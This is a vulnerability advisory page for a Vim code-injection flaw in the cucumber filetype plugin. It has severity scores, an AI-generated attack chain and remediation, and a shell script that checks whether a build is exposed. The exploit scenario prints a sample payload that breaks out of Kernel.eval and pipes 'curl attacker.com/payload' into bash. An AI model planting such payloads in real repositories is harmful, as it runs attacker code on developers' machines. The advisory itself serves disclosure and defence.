Vim CVE-2026-47167

EUVD-2026-36280 · MEDIUM · Code Injection (CWE-94)
2026-06-11 · GitHub_M
CVSS 4.0: 5.1 · Vendor: GitHub_M

Severity by source

Vendor (GitHub_M), PRIMARY: 5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

vuln.today AI: 7.5 HIGH

AC:H for the non-default +ruby build prerequisite; PR:N because attacker needs no victim-system credentials; S:U since shell commands execute under the same user context as Vim.

CVSS 3.1: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSS 4.0: AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS Vector (Vendor: GitHub_M)

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: P
Scope: X

Lifecycle Timeline

Patch available: Jun 11, 2026 - 20:01 (EUVD)
Source Code Evidence Fetched: Jun 11, 2026 - 19:30 (vuln.today)
Analysis Generated: Jun 11, 2026 - 19:30 (vuln.today)

Description (CVE.org)

Vim is an open source, command line text editor. Prior to version 9.2.0496, a code injection vulnerability exists in s:stepmatch() in the cucumber filetype plugin (runtime/ftplugin/cucumber.vim) on Vim builds with +ruby support. Step-definition patterns read from .rb files under the repository's features/*/ or stories/*/ directories are embedded into a Ruby Kernel.eval argument without sufficient escaping, allowing a crafted pattern in an attacker-controlled repository to execute arbitrary Ruby (and through it arbitrary shell commands) when the user invokes a step-jump mapping ([d, ]d). This issue has been patched in version 9.2.0496.

Analysis (AI)

Code injection via unsanitized step-definition patterns in Vim's cucumber filetype plugin allows arbitrary Ruby and shell command execution on any Vim build compiled with +ruby support, prior to version 9.2.0496. An attacker who controls .rb step definition files in a repository can craft a regex-terminating payload that escapes a Kernel.eval() argument, enabling full shell access as the victim's user when the developer invokes the [d or ]d step-jump mapping. …

Attack Chain (AI, derived)

Hypothetical attack flow derived from CVE metadata

Recon: Craft malicious .rb step definition with injected payload
Delivery: Host or contribute it to a repository
Exploit: Victim clones repository and opens .feature file in +ruby Vim
Install: Victim presses [d on a step line
C2: s:stepmatch() embeds pattern into Kernel.eval()
Execute: Arbitrary Ruby executes system() call
Impact: Shell commands run as victim user

Vulnerability Assessment (AI)

Exploitation: Exploitation requires three concurrent conditions: (1) the victim's Vim binary must be compiled with +ruby support - this is a non-default build option absent from the standard Vim packages shipped by Debian, Ubuntu, and many other distributions (verify with vim --version); (2) the victim must open a .feature (Cucumber) file sourced from a repository where the attacker controls at least one .rb step definition file under a features/*/ or stories/*/ subdirectory; and (3) the victim must invoke the [d or ]d step-jump mapping while the cursor is positioned on a step line - this is an explicit keystroke, not triggered by merely opening or saving the file. …

Risk Assessment: The vendor-assigned CVSS 4.0 score of 5.1 (Medium) with vector AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L reflects a conservative impact framing, but the actual code-execution capability warrants a higher severity assessment when +ruby is present. …

Exploit Scenario: An attacker contributing to or creating a public Cucumber Ruby repository embeds a malicious step definition such as Given /xyzzy/; system("curl attacker.com/payload | bash"); #/ do in a .rb file under features/step_definitions/. When a victim developer clones the repository and opens a corresponding .feature file in a +ruby Vim build, pressing [d on a step line causes s:stepmatch() to call Kernel.eval() with the injected pattern, executing the shell payload as the victim's user. …

Remediation: Upgrade to Vim 9.2.0496 or later, available at https://github.com/vim/vim/releases/tag/v9.2.0496; the fix commit is https://github.com/vim/vim/commit/a65a52d684bc58535ad28a4ae824d22e76399934. …
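
The build check implied by the exploitation and remediation notes above, as an added example (not from the advisory or the Vim project): a POSIX shell function that reads vim --version output and reports whether the build has +ruby and predates 9.2.0496. The function name, the status strings and the sample text are constructed for illustration.

```shell
#!/bin/sh
# Classify a Vim build against CVE-2026-47167 from `vim --version` text on stdin.
# Prints one of: not-affected-no-ruby | patched | exposed | unknown
classify_vim_build() {
    awk '
        # Banner line, e.g. "VIM - Vi IMproved 9.2 (..., compiled ...)"
        /^VIM - Vi IMproved [0-9]+\.[0-9]+/ {
            split($5, v, ".")
            major = v[1] + 0; minor = v[2] + 0; have_ver = 1
        }
        # "Included patches: 1-495" or "1-16, 647, 678": keep the highest number
        /^Included patches:/ {
            line = $0
            sub(/^Included patches:/, "", line)
            n = split(line, parts, /[^0-9]+/)
            for (i = 1; i <= n; i++)
                if (parts[i] != "" && parts[i] + 0 > patch) patch = parts[i] + 0
        }
        # Feature list: "+ruby" or "+ruby/dyn" means the Ruby interface is built in
        {
            for (i = 1; i <= NF; i++)
                if ($i == "+ruby" || $i == "+ruby/dyn") ruby = 1
        }
        END {
            if (!have_ver) { print "unknown"; exit }
            if (!ruby)     { print "not-affected-no-ruby"; exit }
            # Fixed release per the advisory: 9.2.0496
            if (major > 9 || (major == 9 && minor > 2) ||
                (major == 9 && minor == 2 && patch >= 496)) print "patched"
            else print "exposed"
        }'
}

# Constructed sample of `vim --version` output (not captured from a real host).
SAMPLE='VIM - Vi IMproved 9.2 (2026 Jan 01, compiled Jan 02 2026 00:00:00)
Included patches: 1-495
Huge version without GUI.  Features included (+) or not (-):
+acl               +file_in_path      -python            +ruby
+arabic            +find_in_path      +python3           +scrollbind'

printf '%s\n' "$SAMPLE" | classify_vim_build
```

On a real host, run vim --version | classify_vim_build. A distribution build that backports the fix without raising the patch number would still be reported as exposed, so confirm against the package changelog in that case.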
